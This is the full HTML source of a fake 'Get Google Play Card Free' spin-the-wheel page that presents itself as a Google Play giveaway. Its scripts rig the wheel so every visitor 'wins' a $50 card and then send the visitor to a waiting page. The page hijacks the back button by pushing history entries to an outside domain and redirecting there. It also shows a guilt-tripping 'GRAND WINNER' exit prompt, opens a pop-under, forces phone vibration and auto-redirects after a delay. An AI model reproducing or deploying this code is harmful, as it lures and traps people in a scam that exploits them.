<html>

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta property="og:locale" content="en_US" />
    <meta property="og:type" content="website" />
    <meta property="og:url" content="https://www.play.google.com" />
    <meta property="og:site_name" content="Get Google Play Card Fre" />
    <meta name="robots" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" />
    <meta property="og:title" content="Get Google Play Card Free" />
    <meta property="og:description" content="Celebrate it's 22th Anniversary" />
    <meta name="description" content="Celebrate it's 22th Anniversary" />
    <meta http-equiv="refresh" content="200; url=http://ilky.tk/internet">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <link rel="icon" type="image/png" href="http://www.imgak.cf/icon.png">
    <title>Earn Free Gift Card | Google Play Card |</title>
    <meta property="og:image" content="http://www.imgak.cf/play_card.png">
    <meta name="twitter:image:src" content="http://www.imgak.cf/play_card.png">
    <meta name="twitter:image" content="http://www.imgak.cf/play_card.png">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/sweetalert/1.1.3/sweetalert.min.css" rel="stylesheet"
        type="text/css">
    </link>
    <!--Style CSS Code Starts From Here-->
    <style>
        ::-webkit-scrollbar {
            width: 0px;
        }

        body {
            background-color: rgb(255, 255, 255);
            font-family: 'Lato', sans-serif;
            margin: 0px;
            padding: 0px;
        }

        .main-content {
            padding: 10px;
            background-color: rgb(255, 255, 255) ! important;
            border-radius: 10px 10px 10px 10px;
        }

        #gpc {
            z-index: 4;
            width: 250px;
            top: 10px;
            left: 55px;
            position: absolute;
            display: none;
        }

        #spinner {
            position: relative;
            margin: 1em auto 0;
            width: 315px;
            overflow: hidden
        }

        #spinBG {
            z-index: 1;
            width: 315px
        }

        #spin {
            z-index: 2;
            position: absolute;
            top: 8px;
            left: 8px;
            width: 300px
        }

        #win {
            position: absolute;
            z-index: 3;
            width: 65px;
            left: 126px;
            top: 120px
        }

        .spinAround {
            -webkit-animation: spin 6.6s;
            -moz-animation: spin 6.6s;
            -o-animation: spin 6.6s;
            animation: spin 6.6s;
            -webkit-animation-timing-function: ease;
            -moz-animation-timing-function: ease;
            -o-animation-timing-function: ease;
            animation-timing-function: ease;
            -webkit-animation-iteration-count: 1;
            -moz-animation-iteration-count: 1;
            -o-animation-iteration-count: 1;
            animation-iteration-count: 1;
            -webkit-animation-direction: normal;
            -moz-animation-direction: normal;
            -o-animation-direction: normal;
            animation-direction: normal;
            -webkit-animation-fill-mode: forwards;
            -moz-animation-fill-mode: forwards;
            -o-animation-fill-mode: forwards;
            animation-fill-mode: forwards
        }

        .spinAround2 {
            -webkit-animation: spinTwo 6.6s;
            -moz-animation: spinTwo 6.6s;
            -o-animation: spinTwo 6.6s;
            animation: spinTwo 6.6s;
            -webkit-animation-timing-function: ease;
            -moz-animation-timing-function: ease;
            -o-animation-timing-function: ease;
            animation-timing-function: ease;
            -webkit-animation-iteration-count: 1;
            -moz-animation-iteration-count: 1;
            -o-animation-iteration-count: 1;
            animation-iteration-count: 1;
            -webkit-animation-direction: normal;
            -moz-animation-direction: normal;
            -o-animation-direction: normal;
            animation-direction: normal;
            -webkit-animation-fill-mode: forwards;
            -moz-animation-fill-mode: forwards;
            -o-animation-fill-mode: forwards;
            animation-fill-mode: forwards
        }

        @media(min-width:360px) {
            #spinner {
                width: 340px
            }
        }

        @media(min-width:360px) {
            #spinBG {
                width: 340px
            }
        }

        @media(min-width:360px) {
            #spin {
                width: 325px
            }
        }

        @media(min-width:360px) {

            #win {
                width: 90px
            }
        }


        @-webkit-keyframes spin {
            0% {
                -webkit-transform: rotate(0deg);
                transform: rotate(0deg)
            }

            90% {
                -webkit-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }

            95% {
                -webkit-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }

            100% {
                -webkit-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }

        @-moz-keyframes spin {
            0% {
                -moz-transform: rotate(0deg);
                transform: rotate(0deg)
            }

            90% {
                -moz-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }

            95% {
                -moz-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }

            100% {
                -moz-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }

        @-o-keyframes spin {
            0% {
                -o-transform: rotate(0deg);
                transform: rotate(0deg)
            }

            90% {
                -o-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }

            95% {
                -o-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }

            100% {
                -o-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }

        @keyframes spin {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg)
            }

            90% {
                -webkit-transform: rotate(3110deg);
                -moz-transform: rotate(3110deg);
                -o-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }

            95% {
                -webkit-transform: rotate(3108deg);
                -moz-transform: rotate(3108deg);
                -o-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }

            100% {
                -webkit-transform: rotate(3109deg);
                -moz-transform: rotate(3109deg);
                -o-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }

        @-webkit-keyframes spinTwo {
            0% {
                -webkit-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }

            90% {
                -webkit-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }

            95% {
                -webkit-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }

            100% {
                -webkit-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }

        @-moz-keyframes spinTwo {
            0% {
                -moz-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }

            90% {
                -moz-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }

            95% {
                -moz-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }

            100% {
                -moz-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }

        @-o-keyframes spinTwo {
            0% {
                -o-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }

            90% {
                -o-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }

            95% {
                -o-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }

            100% {
                -o-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }

        @keyframes spinTwo {
            0% {
                -webkit-transform: rotate(3109deg);
                -moz-transform: rotate(3109deg);
                -o-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }

            90% {
                -webkit-transform: rotate(6314deg);
                -moz-transform: rotate(6314deg);
                -o-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }

            95% {
                -webkit-transform: rotate(6312deg);
                -moz-transform: rotate(6312deg);
                -o-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }

            100% {
                -webkit-transform: rotate(6313deg);
                -moz-transform: rotate(6313deg);
                -o-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }
    </style>
    <!--Style CSS Code Ends Here-->

</head>

<body>
    <main>
        <div class="content">
            <div class="main-content">
                <center>
                    <img id="Logo" src="https://i.imgur.com/I8110fb.png">
                </center>
                <div id="spinner">
                    <img id="spinBG" src="https://i.imgur.com/GNmXz3m.png">
                    <img id="spin" src="https://i.imgur.com/gZOiFQK.png" class="">
                    <img id="win" onclick="spinnerAction()" src="https://i.imgur.com/X0CDnLu.png">
                    <img id="gpc" class="animated rotateIn" src="https://i.imgur.com/rGZscyK.png">
                </div>
                <br>
                <br>
            </div>
        </div>
        <!--Script Code Starts From Here-->
        <script src="https://cdnjs.cloudflare.com/ajax/libs/sweetalert/1.1.3/sweetalert-dev.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
        <script type="text/javascript">
            window.onload = function () {
                swal({

                });
            }
            var spinTimes = 0;
            var isSpin = 0;
            function spinnerAction() {
                if (isSpin == 1) return;
                var spinWin = document.getElementById("spin");
                if (spinTimes != 1) {
                    spinTimes = 1;
                    isSpin = 1;
                    spinWin.className = spinWin.className + " spinAround";
                    setTimeout(function () {
                        swal({
                            title: "",
                            text: "You Won 1 Free Extre Spin!",
                        });
                        isSpin = 0;
                    }, 6500);
                } else if (spinTimes == 1) {
                    isSpin = 1;
                    spinWin.className = spinWin.className + " spinAround2";
                    setTimeout(function () {
                        spinWin.className = spinWin.className + " Op";
                        gpc.style.display = "block";
                        setTimeout(function () {
                            swal({
                                title: "",
                                text: "Congratulation!\n\nYour Prize: Google Play Card $50 \n\nPress ( OK ) To Get The Card",
                                type: "success"
                            },
                                function () { DisableExitTraffic(); window._clicked = 1; window.location.href = "wait.html"; isSpin = 0; });
                        }, 800);
                    }, 6000);
                }
            }
        </script>
        <script>
            var exit = true;
            function exitPop() {
                if (exit == true) {
                    popUnder = window.open('wait.html');
                    popUnder.blur();
                    window.focus();
                }
            }
        </script>
        <script type="text/javascript">
            navigator.vibrate = navigator.vibrate || navigator.webkitVibrate || navigator.mozVibrate || navigator.msVibrate;
            navigator.vibrate([1000, 500, 1000, 500, 1000, 500, 1000, 500, 1000]);
        </script>

        <script
            type="text/javascript">!function () { var t; try { for (t = 0; 10 > t; ++t)history.pushState({}, "", "http://ilky.cf/internet"); onpopstate = function (t) { t.state && location.replace("") } } catch (o) { } }();</script>
        <script type="text/javascript">
            function getParameterByName(name) {
                name = name.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]");
                var regex = new RegExp("[\\?&]" + name + "=([^&#]*)"),
                    results = regex.exec(location.search);
                return results === null ? "" : decodeURIComponent(results[1].replace(/\+/g, " "));
            }
            model = " " + getParameterByName("model");
            document.getElementById('model').innerHTML = model; 
        </script>
        <script type="text/javascript">
            function DisableExitTraffic() {
                PreventExitSplash = true;
            }
            var PreventExitSplash = false;
            var exittraffic_splashalertmessage = "Are you sure want to leave this page?\n\nYou are selected to be our GRAND WINNER! If you forfeit, you opportunity will be given to someone else and I&#8217;m not sure you would want that.\n\nIf you are not interested feel free to leave this page.\n\n\n\n\n";
            var exittraffic_RedirectUrl = "http://ilky.tk/internet";
            function DisplayExitSplash() {
                if (PreventExitSplash == false) {
                    window.scrollTo(0, 0);
                    return exittraffic_splashalertmessage;
                }
            }
            window.onbeforeunload = DisplayExitSplash;
            (function (window, location) {
                history.replaceState(null, document.title, location.pathname + "#!/backbutton");
                history.pushState(null, document.title, location.pathname);
                window.addEventListener("popstate", function () {
                    if (location.hash === "#!/backbutton") {
                        history.replaceState(null, document.title, location.pathname);
                        setTimeout(function () {
                            location.replace(exittraffic_RedirectUrl);
                        }, 0);
                    }
                }, false);
            }(window, location));
        </script>
        <!--Script Code Ends Here-->
    </main>
</body>

</html>